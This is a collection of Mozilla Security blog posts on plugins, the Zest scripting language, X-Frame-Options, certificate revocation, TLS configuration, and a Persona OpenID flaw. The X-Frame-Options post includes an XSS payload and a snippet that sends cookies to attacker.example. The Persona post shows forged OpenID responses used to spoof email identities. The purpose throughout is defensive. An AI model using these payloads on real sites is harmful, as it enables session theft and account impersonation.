Update on Plugin Activation

Chad Weiner


To provide a better and safer experience on the Web, we have been working to move Firefox away from plugins.

After much testing and iteration, we determined that Firefox should no longer activate most plugins by default and instead let people choose when to enable plugins on the sites they visit. We call this feature click-to-play plugins.

We strongly encourage site authors to phase out their use of plugins. The power of the Web itself, especially with new technologies like emscripten and asm.js, makes plugins much less essential than they once were. Plus, plugins present real costs to Firefox users. Though people may not always realize it, we know plugins are a significant source of poor performance, crashes and security vulnerabilities.

Developers will increasingly find what they need in the Web platform, but we also recognize that it will take some time for them to migrate to better options. Also, we know there are plugins that our users rely on for essential tasks and we want to provide plugin authors and developers with a short-term exemption from our default click-to-play approach. Today, we’re announcing the creation of a temporary plugin whitelist.

Any plugin author can submit an application to be considered for inclusion on the whitelist by following the steps outlined in our plugin whitelist policy. Most importantly, we are asking for authors to demonstrate a credible plan for moving away from NPAPI-based plugins and towards standards-based Web solutions.

Today marks the beginning of an application window that will run until March 31, 2014. Any plugin author’s application received before the deadline will be reviewed and processed before click-to-play is activated by default in Firefox. Whitelisted status will be granted for four consecutive Firefox releases and authors may reapply for continued exemption as the end of the grace period draws near.

Our vision is clear: a powerful and open Web that runs everywhere without the need for special purpose plugins. The steps outlined here will move us toward that vision while still balancing today’s realities.

- Chad Weiner, Director of Product Management

Mozilla Security @ BSidesVancouver and CanSecWest

yboily

This year Mozilla will be sponsoring BSidesVancouver, a free, community-oriented event on March 10th & 11th in Vancouver, BC. This event is very much in the spirit of the Mozilla community and mission, and several of our security team members will be attending both BSidesVancouver and CanSecWest.

In addition to our team members attending, Jeff Bryner and Curtis Koenig will be speaking at the event about some aspects of the security processes and technologies that Mozilla uses and has built. If you are going to be at these events and would like to connect with us at BSidesVancouver or CanSecWest, send us a message at security@mozilla.org, or reach out to us on Twitter (@mozsec).

Reporting Web Vulnerabilities to Mozilla using Zest

Simon Bennetts

Overview

We always want to hear about potential vulnerabilities in our software, and have a long running Bug Bounty program to reward those who find serious security bugs.

However, we sometimes receive bug notifications for vulnerabilities in our websites that are difficult to reproduce.

This is one of the reasons why we developed Zest: a security scripting language.

We would like to encourage everyone to submit vulnerability reports for server side web applications using Zest. There are plans for Zest to also handle client side vulnerabilities in the future.

Introducing Zest

Zest is an experimental, specialized scripting language (also known as a domain-specific language) developed by the Mozilla security team and intended to be used in web-oriented security tools.

Zest scripts are defined in JSON, but they are designed to be represented visually in security tools.

Zest is completely free, open source and can be included in any tool whether open or closed, free or commercial.

Creating a simple Zest script using ZAP

To demonstrate how to create a Zest script, we will use the OWASP Zed Attack Proxy (ZAP), which has built-in support for Zest.

ZAP is an intercepting proxy, so you will need to configure your browser to proxy through ZAP. Details of how to do this are included in the ZAP help file, but if you are unsure how to do this you can also use Plug-n-Hack, as described in the next section, as this will configure your browser for you.

The latest version of the Zest add-on for ZAP provides a toolbar button for quickly recording Zest scripts:

If this button is not shown, click the ‘Manage Add-ons’ button on the toolbar (the three stacked blocks), click the ‘Check for updates’ button and update the Zest add-on.

Note that while Zest is included with ZAP, there is a known problem whereby Zest support can get removed from ZAP after an update, so if Zest is not included in the list of installed add-ons then select the Marketplace tab, find and select the Zest add-on and install it from there. In either case you should restart ZAP.

Clicking on the “Record a new Zest script…” button will open a dialog for creating a new Zest script. You only need to give the script a title, but if you also select (or type) a prefix from the pull-down list of sites you have already accessed, ZAP will only record requests with that prefix. The toolbar button will turn red and stay pressed to indicate that you are recording.

Now use your browser to reproduce the server side vulnerability that you wish to report.

When you have finished click the toolbar button again to stop recording. The button will turn black.

If you now look at ZAP, you should see a graphical representation of the script you have just recorded in the ‘Scripts’ tab and the JSON representation in the ‘Script Console’ tab:

Creating a simple Zest script using ZAP and PnH

If you are new to ZAP then an alternative approach is to use Plug-n-Hack (PnH), another initiative from the Mozilla Security Team, which is covered in another blog post.

To configure Firefox to use ZAP just click on the ‘Plug-n-Hack’ button on the ZAP ‘Quick Start’ tab:

Install the Plug-n-Hack Firefox Add-on and accept all of the dialogs. Note that we recommend that you use a separate Firefox profile for security testing.

Your browser should now be proxying via ZAP – try visiting some sites and verify that they appear in the ZAP ‘History’ tab.

You can now record a Zest script as above, but you can also control both PnH and ZAP via the Firefox Developer Toolbar.

Use ‘Shift F2’ to access the Developer Toolbar and then type ‘zap’ – you should see a list of commands like:

To record a Zest script in ZAP select (or type) the following command:

zap record on global

Now use your browser to reproduce the server side vulnerability that you wish to report.

When you have finished select (or type) the following command:

zap record off global

The Zest script will now be visible in the ‘Scripts’ tab and the JSON representation in the ‘Script Console’ tab as above.

Reporting the bug

To report the issue please file a bug in bugzilla, clearly describing the problem as you understand it.

Check that your Zest script does not contain any personal data, then save it to disk using the ‘Save Script…’ button in the ‘Scripts’ tab.

This script includes the data that you sent and received in your browser while you were recording, which allows us to see exactly what you did and what the result was. This makes reproducing potential vulnerabilities much easier.

Attach this file, which contains the JSON version of your script, via the Web Bounty Form.

For more details about how to submit security bugs see the ‘Process’ section of the Bug Bounty page.

You can just attach the script as is, but you may also want to edit it before submitting it to us.

Editing Zest scripts in ZAP

You can double click on any Zest node in the tree and edit it. You can also right click on nodes to delete them. This means that you can easily remove requests that are unrelated to the problem you are reporting.

If you select a Zest Request node then the related request and response will be shown in the ZAP ‘Request’ and ‘Response’ tabs.

You can also redact strings in the responses that you don’t want to include, for example session cookies and passwords.

To do this select the relevant request and then select the ‘Response’ tab.

Find and highlight the relevant string, right click on it and select ‘Redact Text…’

This will cause a dialog to be shown that allows you to specify the replacement string (by default, five ‘block’ characters) and offers an ‘Apply to all current requests’ option, which will cause the string to be replaced everywhere it appears in the script.

Running Zest scripts in ZAP

You can run Zest scripts in ZAP via the ‘Run’ button in the ‘Script Console’ tab.

Note that this is only enabled for ‘stand alone’ scripts – ZAP supports many other types of scripts which are integrated with ZAP features like the active scanner and therefore cannot be run independently.

When you run your script you will see the requests and responses shown in the ‘Zest Results’ tab.

You may see that some requests are flagged as failing.

This is because, by default, ZAP adds two assertions to each request: these check that the status code matches and that the response length is the same as before, plus or minus 2%. You can remove or change these assertions and add new ones if you like, all via right-click menus.
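The logic behind those two default assertions is roughly the following (an illustrative JavaScript sketch, not Zest’s actual implementation):

// original: the response recorded with the script; replay: the response just received.
function defaultAssertionsPass(original, replay) {
  const statusOk = replay.statusCode === original.statusCode;
  const lengthOk =
    Math.abs(replay.body.length - original.body.length) <= 0.02 * original.body.length;
  return statusOk && lengthOk;
}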

You can compare new results with the previous ones by right clicking the request in the ‘Zest results’ tab and selecting ‘Zest: Compare with original response’:

Creating Advanced Zest Scripts in ZAP

You can add new requests to a Zest script by right clicking on any request in ZAP and selecting ‘Add to Zest Script’:

Zest supports other types of statements, including:

  • Conditionals
  • Loops
  • Assignments
  • Actions
  • Controls

These can all be added via right clicking on the Zest tree nodes:

These statements allow very powerful scripts to be created quickly and easily.

ZAP also adds useful features, such as automatically adding assign statements to handle any anti-CSRF tokens it detects.

For more information about these statements see the Zest pages on MDN.

Demo

I demoed Zest at AppSec USA in November 2013, and the full video of my talk is available on YouTube. The Zest part of the talk starts at 23:47.

Feedback

Zest is still at an early stage of development and all constructive feedback is very welcome.

Anyone can contribute to the onward development of Zest, and teams or individuals who develop security tools are especially welcome to join and help shape Zest’s future.

The Zest code is on GitHub and there is a Google Group for discussing everything about Zest.

On the X-Frame-Options Security Header

Frederik Braun


A few weeks ago, Mario Heiderich and I published a white paper about the X-Frame-Options security header. In this blog post, I want to summarize the key arguments for setting this security header in your web application.

X-Frame-Options is an optional HTTP response header that was introduced in 2008 and found its first implementation in Internet Explorer 8. Setting this header in your web application defines whether your site may be displayed within a frame element (e.g., iframe). The syntax for this header provides three options: ALLOW-FROM, DENY and SAMEORIGIN. Not sending the header implies allowing frames in general. ALLOW-FROM allows whitelisting a specific origin. The opposite is, of course, DENY, which means that no website is ever allowed to display your website in a frame. A common middle ground is to send SAMEORIGIN, which means that only websites of the same origin may frame it.
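For example, a minimal Node.js server that opts for the middle ground could look roughly like this (a sketch, not production code):

const http = require('http');

http.createServer((req, res) => {
  // SAMEORIGIN: only pages from this site may frame the response.
  // Alternatives: 'DENY', or 'ALLOW-FROM https://partner.example' (placeholder origin).
  res.setHeader('X-Frame-Options', 'SAMEORIGIN');
  res.end('hello');
}).listen(8080);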

This blog post will highlight some attacks that can be thwarted by forbidding the framing of your document. First of all, clickjacking. The term gained major attention in 2008 and covers a multitude of techniques in which an evil web page secretly includes yours in a frame. The author of the evil website will make your website transparent and present buttons on top of it. Anyone visiting the evil page will then click on something seemingly unrelated, which actually results in mouse clicks in your web application.

A wide class of attacks on websites leverages missing security features in the browser. Most modern browsers provide hardened security mechanisms that can easily thwart problems with content injection. The problem lies, as so often, in backwards compatibility. The most recent browser versions are obviously more secure than the previous ones, but when somebody frames your website, they can tell it to run in a compatibility mode. This feature only exists in Internet Explorer, and it brings back the vintage rendering behavior of IE7 (2006). In Internet Explorer, the document mode is inherited from the top window by all frames. If the evil website runs in IE7 compatibility mode, then so does yours! This is an example of how IE7 compatibility mode can be triggered for any framed website:

<meta http-equiv="X-UA-Compatible" content="IE=7" />

If your website did not allow itself to be framed, your IE users would not be at risk.

Another technique for possible attackers comes with window.name. This attribute of your browsing window (a tab, a popup and a frame are all windows in JavaScript’s sense) can be set by others, and you cannot prevent it. The implications of this are manifold, but just in terms of Cross-Site Scripting (XSS) attacks it can make things much easier for an attacker. Sometimes, when an attacker is able to inject and execute scripts on your web page, he might be hindered by a length restriction: say your website does not allow names that exceed 80 characters, or messages longer than 140. The window.name property can help bypass these restrictions in a very easy way. The attacker can just frame your website and give it a name of his liking, by supplying it in the frame’s name attribute. The JavaScript he then executes can be as short as <svg/onload=eval(name)>, which means it will execute the JavaScript specified in the name attribute of the frame element.
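To make this concrete, a hypothetical attacker page could set up the frame like this (victim.example and attacker.example are placeholder hosts):

// Attacker-controlled page: the real payload travels in the frame's name,
// so the injection on the framed page only needs the short eval(name) trigger.
var frame = document.createElement('iframe');
frame.src = 'https://victim.example/page-with-injection';
frame.name = 'new Image().src = "https://attacker.example/log?c=" + encodeURIComponent(document.cookie)';
document.body.appendChild(frame);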

These and many other attacks are possible if you allow your web page to be displayed in a frame. Just recently, Isaac Dawson from Veracode published a report about security headers on the top 1 million websites, which shows that only 30,000 of them currently supply this header. However, the fact that many other sites are vulnerable to this sort of attack is not a good reason to leave your website unprotected. You can easily address many security problems by adding this simple header to your web application right away: If you’re using Django, check out the XFrameOptionsMiddleware. For NodeJS applications, you can use the helmet library to add security headers. If you want to set this header directly from within Apache or nginx, just take a look at the X-Frame-Options article on MDN.
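For a Node.js application, a minimal Express sketch might look like this (assuming helmet’s frameguard middleware; check the documentation of the helmet version you use for the exact API):

const express = require('express');
const helmet = require('helmet');

const app = express();
// Emits X-Frame-Options: SAMEORIGIN on every response.
app.use(helmet.frameguard({ action: 'sameorigin' }));
app.get('/', (req, res) => res.send('framing restricted'));
app.listen(3000);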

Revoking Trust in one ANSSI Certificate

kwilson


Last week, Mozilla was notified that an intermediate certificate, which chains up to a root included in Mozilla’s root store, was loaded into a man-in-the-middle (MITM) traffic management device. It was then used, during the process of inspecting traffic, to generate certificates for domains the device owner does not legitimately own or control. While this is not a Firefox-specific issue, to protect our users we are updating the certificate store of Firefox in order to distrust these certificates. The Certificate Authority (CA) has told us that this action was not permitted by their policies and practices, and they have revoked the intermediate certificate that signed the certificate for the traffic management device.

Issue

ANSSI (Agence nationale de la sécurité des systèmes d’information) is the French Network and Information Security Agency, a part of the French Government. ANSSI (formerly known as DCSSI) operates the “IGC/A” root certificate that is included in NSS, and issues certificates for French Government websites that are used by the general public. The root certificate has an Issuer field with “O = PM/SGDN”, “OU = DCSSI”, and “CN = IGC/A”.

A subordinate CA of ANSSI issued an intermediate certificate that they installed on a network monitoring device, which enabled the device to act as a MITM of domains or websites that the certificate holder did not own or control. Mozilla’s CA Certificate Policy prohibits certificates from being used in this manner when they chain up to a root certificate in Mozilla’s CA program.

Impact

An intermediate certificate that is used for MITM allows the holder of the certificate to decrypt and monitor communication within their network between the user and any website without browser warnings being triggered. An attacker armed with a fraudulent SSL certificate and an ability to control their victim’s network could impersonate websites in a way that would be undetectable to most users. Such certificates could deceive users into trusting websites appearing to originate from the domain owners, but actually containing malicious content or software.

We believe that this MITM instance was limited to the subordinate CA’s internal network.

Status

Mozilla is actively revoking trust in the subordinate CA certificate that was misused to generate the certificate used by the network appliance. This change will be released to all supported versions of Firefox in the updates this week.

Additional action regarding this CA will be discussed in the mozilla.dev.security.policy forum.

End-user Action

We recommend that all users upgrade to the latest version of Firefox. Firefox 26 and Firefox 24 ESR both contain the fix for this issue, and will be released this week.

Credit

Thanks to Google for reporting this issue to us.

Kathleen Wilson
Module Owner of Mozilla’s CA Certificates Module

Navigating the TLS landscape

Julien Vehent


A few weeks ago, we enabled Perfect Forward Secrecy on https://www.mozilla.org [1]. Simultaneously, we published our guidelines for configuring TLS on the server side. In this blog post, we want to discuss some of the SSL/TLS work that the Operations Security (OpSec) team has been busy with.

For operational teams, configuring SSL/TLS on servers is becoming increasingly complex. BEAST, LUCKY13, CRIME, BREACH and RC4 are examples of a fast-moving security landscape that has made recommendations from only a few months ago obsolete.

Mozilla’s infrastructure is growing fast. We are adding new services for Firefox and Firefox OS, in addition to an ever increasing number of smaller projects and experiments. The teams tasked with deploying and maintaining these services need help sorting through known TLS issues and academic research. So, for the past few months, OpSec has been reviewing the state of the art of TLS. This work is parallel and complementary to the Security Engineering team’s work on cipher preferences in Firefox. The end goal is to support, at the infrastructure level, the security features championed by Firefox.

We published our guidelines at https://wiki.mozilla.org/Security/Server_Side_TLS. The document is a quick reference and a training guide for engineers. There is a strong demand for a standard ciphersuite that can be copied directly into configuration files. But we also wanted to publish the building blocks of this ciphersuite, and explain why a given cipher is preferred to another. These building blocks are the core of the ciphersuite discussion, and will be used as references when new attacks are discovered.

Another important aspect of the guideline is the need to be broad: we want people to be able to reach https://mozilla.org and access Mozilla’s services from anywhere. For this reason, SSLv3 is still part of the recommended configuration. However, ciphers that are deprecated and no longer needed for backward compatibility are disabled. DSA ciphers are included in the list as well: almost no one uses DSA certificates right now, but some might in the future.

At the core of our effort is a strong push toward Perfect Forward Secrecy (PFS) and OCSP stapling.

PFS improves secrecy in the long run, and PFS ciphers will become the de facto choice in all browsers. But it comes with new challenges: the handshake takes longer, due to the key exchange, and a new parameter (dhparam/ecparam) is needed. Ideally, the extra parameter should provide the same level of security as the RSA key does. But we found that old client libraries, such as Java 6, are not compatible with larger parameter sizes. This is a problem we cannot solve server-side, because the client has no way to tell the server which parameter sizes it supports. As a result, the server starts the PFS handshake and the client fails in the middle of the handshake. Without a way for the handshake to fall back and continue, we have to use smaller parameter sizes until old libraries can be deprecated.
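To illustrate where these parameters live, here is a minimal Node.js sketch (file names are placeholders; this is not Mozilla’s configuration):

const fs = require('fs');
const https = require('https');

const server = https.createServer({
  key: fs.readFileSync('server.key'),   // placeholder paths
  cert: fs.readFileSync('server.crt'),
  // The Diffie-Hellman parameters are supplied explicitly; their size is the
  // compatibility trade-off discussed above (old clients such as Java 6
  // reject larger parameter sizes).
  dhparam: fs.readFileSync('dhparam.pem'),
  honorCipherOrder: true,               // let the server pick the cipher
}, (req, res) => res.end('ok'));

server.listen(443);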

OCSP stapling is a big performance improvement. OCSP requests to third-party resolvers block the TLS handshake, directly impacting the user’s perception of page opening time. Recent web servers can now cache the OCSP response and serve it directly, saving the client the round trip to the OCSP responder. OCSP stapling is likely to become an important feature of browsers in the near future, because it improves performance and reduces the cost of running worldwide OCSP responders for Certificate Authorities.

OpSec will maintain this document by keeping it up to date with changes in the TLS landscape. We are using it to drive changes in Mozilla’s infrastructure. This is not a trivial task, as TLS is only one piece of the complex puzzle of providing web connectivity to large websites. We found that very few products provide the full set of features we need, and most operating systems don’t provide the latest TLS versions and ciphers. This is a step forward, but it will take some time until we provide first class TLS across the board.

Feel free to use, share and discuss these guidelines. We welcome feedback from the security and cryptography communities. Comments can be posted on the discussion section of the wiki page, submitted to the dev-tech-crypto mailing list, posted on Bugzilla, or in #security on IRC. This is a public resource, meant to improve the use of HTTPS on the Internet.

[1] bug 914065

Learning From a Recent Security Vulnerability in Persona

Lloyd Hilaiel

The purpose of our “Bug Bounty Program” is to encourage contributors to test and experiment with our code for the purposes of improving its functionality, security and robustness. Through this program we were recently alerted to a potential security flaw in one of our web services products, Persona.

In short, the issue reported could have allowed an attacker to impersonate any gmail.com or yahoo.com user on a website that supports Persona.  We have no evidence that it was exploited, and the issue has been resolved in production.  You can read a summary of the timeline in our recent disclosure.

Background: Persona and Identity Bridging


To understand the vulnerability, a little background on Persona is required:  Persona is a federated protocol which allows a user to verify their ownership of an email address by directly authenticating with their email provider.

If a user’s email provider does not support Persona, Mozilla can temporarily act as a trusted third party and vouch for the user. Mozilla will only vouch for a user if they can prove ownership of their email address, often by clicking a confirmation link mailed to that address. To streamline this process, Mozilla recently introduced a feature known as “Identity Bridging.” Bridging allows Mozilla to use existing public APIs, like OAuth or OpenID, to verify a user’s identity directly in the browser, without needing to send a confirmation email.

You can learn more about Identity Bridging in the original announcement. Generally, bridges are designed as a temporary measure. They allow Mozilla to deliver a streamlined login experience in advance of email providers supporting Persona themselves. Currently, Mozilla operates two bridges, one for Google and one for Yahoo users, both based on OpenID.

When logging into a website, Persona prompts the user to type an email address. Persona then performs discovery against the email’s domain to determine if the given email provider supports Persona.

If so, the user is sent directly to the provider to authenticate. If not, the user is sent to Mozilla’s fallback.
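As an illustration, that discovery step can be sketched like this (assuming Node.js; Persona support documents are served from /.well-known/browserid on the email’s domain, and their contents are omitted here):

const https = require('https');

// Resolves to true if the domain publishes a Persona support document.
function supportsPersona(domain) {
  return new Promise((resolve) => {
    https.get(`https://${domain}/.well-known/browserid`, (res) => {
      let body = '';
      res.on('data', (chunk) => { body += chunk; });
      res.on('end', () => {
        try {
          resolve(res.statusCode === 200 && JSON.parse(body) !== null);
        } catch (e) {
          resolve(false); // not parseable: treat as unsupported
        }
      });
    }).on('error', () => resolve(false));
  });
}

The result of this check decides between sending the user to the provider itself and sending them to Mozilla’s fallback.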

The fallback maintains a list of email domains and associated identity bridges. If a bridge is available, the user is sent to that bridge to authenticate. If not, Mozilla sends the user a confirmation email to verify ownership of the address.

Authenticating at a bridge occurs as a normal OpenID transaction:

  1. The bridge redirects users to the OpenID endpoint of the respective provider, requesting confirmation of ownership of an email.
  2. Subsequent to user interaction, the user is redirected back to the bridge with information supplied by the email provider in GET parameters.
  3. Online server-to-server verification of the authenticity of the request parameters is performed (a sketch of this step follows the list).
  4. Once verified, the user’s email address is considered confirmed, and the bridge issues a certificate which allows the user to assert ownership in a separate offline operation.
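As a rough illustration of step 3, a relying party can perform the direct verification defined by OpenID 2.0 by posting the received fields back to the provider (a simplified sketch assuming a fetch-capable JavaScript runtime):

// receivedParams: the openid.* GET parameters the provider sent back in step 2.
async function verifyWithProvider(endpoint, receivedParams) {
  const body = new URLSearchParams(receivedParams);
  body.set('openid.mode', 'check_authentication');
  const response = await fetch(endpoint, { method: 'POST', body });
  const text = await response.text();
  // The provider answers in key-value form; only "is_valid:true" counts as verified.
  return /^is_valid\s*:\s*true\s*$/m.test(text);
}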


What Went Wrong?


The flaw that was discovered was in step #4 above. Using OpenID to verify a user’s ownership of an email address is a tricky process. OpenID Attribute Exchange is the standard that allows an email provider (an identity provider, or IdP) to encode arbitrary attributes (such as email addresses) in the GET parameters of the URL of the website using OpenID (the relying party, or RP). OpenID authentication further allows the IdP to provide a signature that covers a subset of the returned values.

The vulnerability could have allowed a malicious user to trick Persona into trusting unsigned parameters. To demonstrate the nature of related exploits, let’s explore a valid response and associated, simplified attacks:


A Valid OpenID Provider Response


To begin, in order to successfully confirm ownership of an email address via OpenID, one must verify that the OpenID endpoint is authoritative for the email in question.  For gmail.com addresses, Google is authoritative – for yahoo.com addresses, Yahoo is authoritative.

Once you’ve identified the correct endpoint for the email in question, the simplified example below (many required fields are removed) demonstrates a valid verification response:

  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint,ns.ext1,ext1.mode,ext1.type.email,ext1.value.email
  openid.sig: <base 64 encoded signature>
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

In this response, the openid.sig parameter contains a signature that covers the fields enumerated in the openid.signed parameter. Included in the signature are the openid.ext1 fields, which contain the email address of the user at Gmail. Popular OpenID providers offer a service that allows online validation of signatures. However, verifying a signature is not enough, and many popular OpenID libraries may appear deceptively simple.

To explore the nature of data validation required, let’s walk through a couple possible attacks.


Attack #1: Unsigned Email Attribute


Consider the following hypothetical return parameters from the IdP:

  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint
  openid.sig: <base 64 encoded signature>
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

This set of response data has a valid signature, but the signature does not cover the email address returned by the IdP. Many popular OpenID libraries will return an identical response to calling code regardless of whether the returned attributes are signed. This would allow an attacker to obtain a valid OpenID response that does not include an email address, and then append their own claimed email address. This simple attack, combined with behavior common in OpenID libraries, can lead to vulnerabilities.
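The corresponding defense is to treat an attribute as trustworthy only if it is listed in openid.signed. A minimal sketch of that check, using the parameter names from the examples above (error handling and signature validation omitted):

function signedEmailOrNull(params) {
  const signed = new Set((params['openid.signed'] || '').split(','));
  const typeOk = params['openid.ext1.type.email'] === 'http://axschema.org/contact/email';
  // Both the type and the value of the email attribute must be covered by the signature.
  if (typeOk && signed.has('ext1.type.email') && signed.has('ext1.value.email')) {
    return params['openid.ext1.value.email'];
  }
  return null; // unsigned or missing: do not trust it
}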


Attack #2: Data Extraction Flaws


Depending on the RP’s OpenID implementation, it’s possible that an attacker can spoof an email address despite the presence of expected values that are valid and signed.  Consider the following:

  openid.ns.foo: http://openid.net/srv/ax/1.0
  openid.foo.mode: fetch_response
  openid.foo.type.email: http://axschema.org/contact/email
  openid.foo.value.email: victim@gmail.com
  openid.op_endpoint: https://www.google.com/accounts/o8/ud
  openid.signed: op_endpoint,ns.ext1,ext1.mode,ext1.type.email,ext1.value.email
  openid.sig: 
  openid.ns.ext1: http://openid.net/srv/ax/1.0
  openid.ext1.mode: fetch_response
  openid.ext1.type.email: http://axschema.org/contact/email
  openid.ext1.value.email: example@gmail.com

In this case, a properly signed email is present in the response; however, an unsigned email precedes it. Online verification will succeed, and depending on how value extraction is implemented, this might be enough to cause the incorrect (unsigned) email to be extracted and returned to calling code, resulting in unauthorized access to victim@gmail.com’s account. In a popular OpenID implementation we found a lack of rigor in value extraction that could lead to vulnerabilities of this nature.
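Rigorous extraction therefore means resolving the attribute exchange alias from a signed namespace declaration, rather than grabbing the first field that looks like an email. A simplified sketch of that idea (real code must also validate the signature itself):

const AX_NS = 'http://openid.net/srv/ax/1.0';
const EMAIL_TYPE = 'http://axschema.org/contact/email';

function extractSignedEmail(params) {
  const signed = new Set((params['openid.signed'] || '').split(','));
  for (const key of Object.keys(params)) {
    const match = key.match(/^openid\.ns\.(.+)$/);
    if (!match) continue;
    const alias = match[1];
    // Only consider aliases whose namespace declaration is itself signed.
    if (params[key] !== AX_NS || !signed.has('ns.' + alias)) continue;
    if (params['openid.' + alias + '.type.email'] === EMAIL_TYPE &&
        signed.has(alias + '.type.email') && signed.has(alias + '.value.email')) {
      return params['openid.' + alias + '.value.email'];
    }
  }
  return null;
}

Applied to the response above, the unsigned openid.foo.* fields are ignored and only the signed example@gmail.com value is returned.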


How Can Others Avoid These Pitfalls?


The simplified attacks in this post give you a flavor of the attention to detail required when using OpenID to confirm email ownership.  The same cautions apply to any sensitive information that you rely on that is returned from OpenID.

Our suggestions are twofold:

For library authors: Go the extra mile.  If you perform extraction of values returned by the IdP, perform rigorous validation, and expose the trust level of the return value.  For instance, in JavaScript, rather than returning an email property,  scope that property under an .unsigned or .untrusted namespace.  Make it blindingly obvious what values are, and are not, trustworthy.

For site owners using OpenID:  Give your implementation a deep look.  Ensure that identifying values are signed, types are as you expect, and parsing is rigorous.  For the IdPs that you use, research their suggested best practices.
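To make the first suggestion concrete, a hypothetical library could split the returned attributes by trust level instead of flattening them (a sketch; the names are illustrative, not an existing API):

function splitByTrust(params) {
  const signed = new Set((params['openid.signed'] || '').split(','));
  const result = { signed: {}, unsigned: {} };
  for (const [key, value] of Object.entries(params)) {
    if (!key.startsWith('openid.') || key === 'openid.sig' || key === 'openid.signed') continue;
    const field = key.slice('openid.'.length);
    (signed.has(field) ? result.signed : result.unsigned)[field] = value;
  }
  return result;
}

Calling code then has to opt in explicitly, e.g. result.signed['ext1.value.email'], and anything under result.unsigned is obviously not to be trusted.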


Parting Thoughts


This was a serious vulnerability in Persona; however, our evidence indicates it was addressed before users were affected. Moving forward, we will be conducting a review of the bridging code and the third-party libraries it uses, and our Bug Bounty program will continue to be a vehicle for researchers to disclose vulnerabilities in our critical services. Finally, we will continue to address discovered vulnerabilities with all due effort, and openly and responsibly disclose them.

Bug Bounty Program Finds and Helps Resolve Security Vulnerability in Persona

mcoates

The purpose of our “Bug Bounty Program” is to encourage contributors to test and experiment with our code for the purposes of improving its functionality, security and robustness. Through this program we were recently alerted to a potential security flaw in one of our web services products.

Issue

On Tuesday, September 24th, Mozilla was notified by a security researcher of a vulnerability within the Persona service that could potentially have allowed an attacker to authenticate to a Persona-enabled website using the identity of an existing Gmail or Yahoo account.

As of Tuesday, October 1st, we’ve deployed updates to Persona to fully address this security concern. We also reviewed available log data from Sept 10 through October 2nd and confirmed that this flaw has not been used to target any users.

Impact

The vulnerability could have allowed a malicious attacker to authenticate to a Persona-enabled website using the identity of an existing Gmail or Yahoo account.

Note: This issue only impacted the Persona service and sites that implement Persona. This vulnerability has no bearing on the security of a user’s Gmail or Yahoo email service.

Status

Mozilla immediately investigated and tested patches to address this issue. Initial patches to Persona were deployed on Friday, September 27th and additional patches for an identified edge case were deployed on Tuesday, October 1st.

The vulnerability that led to this issue was created by incorrect assumptions about the behavior and security of two third-party libraries. We’ve captured these details more fully in a technical post on the issue authored by Lloyd Hilaiel.

Credit for discovery of this issue goes to Daniel Fett, Ralf Kuesters, and Guido Schmitz, researchers at the Chair of Information Security and Cryptography, University of Trier, Germany.

HITBSecConf HackWeekDay 2013

Paul Theriault


Mozilla is proud to be once again sponsoring HackWeekDay at the Hack-in-the-Box security conference in Malaysia in October. The event is a chance for developers – both students and professionals – to come together and prototype new apps and features for Firefox OS – security-related or otherwise. We want to build on the already strong community in the region and encourage the open-source community to support the future of the mobile web.

For details of the prizes on offer and how to get involved, see the HackWeekDay page on the HITB website.

What are we hoping to achieve?

We want you to help push the Firefox OS platform forward. This competition is being sponsored by the security team at Mozilla, but you can hack on any app that is interesting to you. And not just apps – we would love to see people developing new features for Firefox OS itself. A group of Mozillians will be there to help developers test their entries on Firefox OS devices and award prizes (including Firefox OS phones!).

How can people get prepared?

Interested developers who want to get started should get familiar with how to develop Apps for Firefox OS. Download the simulator, and make a basic app – this tutorial provides the basics of building apps for Firefox OS.

Got the basics down? Have a read of this page for tips on how to make fast mobile apps – this is critical for mobile and even more so on Firefox OS, which targets more affordable and therefore lower-powered handsets.

Feeling strong with Apps, or just looking for inspiration? Dive into the Firefox OS front-end code. Everything the user sees with Firefox OS is actually written in the same web technologies used for Apps: HTML, JavaScript and CSS. Exploring the Firefox OS front-end, code-named “Gaia”, is a great way to get a deeper understanding of the platform.

If you want to develop on Firefox OS itself, see the Hacking on Gaia page on MDN.

What are we looking for in the entries?

  • Prototypes which effectively demonstrate a new or interesting feature
  • Innovative use of new Web APIs
  • High-quality execution (especially within the constraints of mobile)
  • Features that increase the security and privacy of Firefox OS users

What about others who can’t attend the conference?

  • Make apps for the Mozilla marketplace
  • Volunteer to help Mozilla security team on Firefox OS (or anything else) (come find us on irc://irc.mozilla.org/security or email security@mozilla.org)

Will the community be there?

Yes! Mozilla Malaysia is planning a presence at the event.

Introducing html2dom, an alternative to setting innerHTML

Frederik Braun


Having spent significant time reviewing the source code of some Firefox OS core apps, I noticed that a lot of developers like to use innerHTML (or insertAdjacentHTML). It is indeed a useful API to insert HTML from a given string without hand-crafting objects for each and every node you want to insert into the DOM.
The dilemma begins, however, when this is not a hardcoded string but something that is constructed dynamically. If the string contains user input (or something from a malicious third party – be it an app or a website), it can just as easily insert and change application logic (Cross-Site Scripting): the typical example is a <script> tag that runs code on the attacker’s behalf and reads, modifies or forwards the current content to a third party. CSP, which we use in Firefox OS, can only mitigate some of these attacks, but certainly not all.
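A hypothetical example of the pattern (the element ID and the query parameter are made up for illustration):

var query = new URLSearchParams(location.search).get('q') || '';
var results = document.getElementById('results');

// Dangerous: attacker-controlled text becomes markup, e.g. '<img src=x onerror=...>'.
results.innerHTML = '<li>Results for ' + query + '</li>';

// Safer: the input is only ever treated as text.
var item = document.createElement('li');
item.textContent = 'Results for ' + query;
results.appendChild(item);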

Using innerHTML is bad (Hint: DOM XSS)

What’s also frustrating about these pieces of code is that analyzing them requires you to manually trace every function call and variable back to its definition to see whether it is indeed tainted by user input.

With code changing frequently, those reviews don’t really scale. One possible approach is to avoid using innerHTML for good. Even though this idea sounds a bit naive, I dived into the world of automated HTML parsing and code generation to see how feasible it is.

Enter html2dom

For the sake of experimentation (and solving this neatly self-contained problem), I have created html2dom. html2dom is a tiny library that accepts an HTML string and returns alternative JavaScript source code. Example:

<p id="greeting">Hello <b>World</b></p>

This will yield the following JavaScript (as a string):

var docFragment = document.createDocumentFragment();
// this fragment contains all DOM nodes
var greeting = document.createElement('P');
greeting.setAttribute("id", "greeting");
docFragment.appendChild(greeting);
var text = document.createTextNode("Hello ");
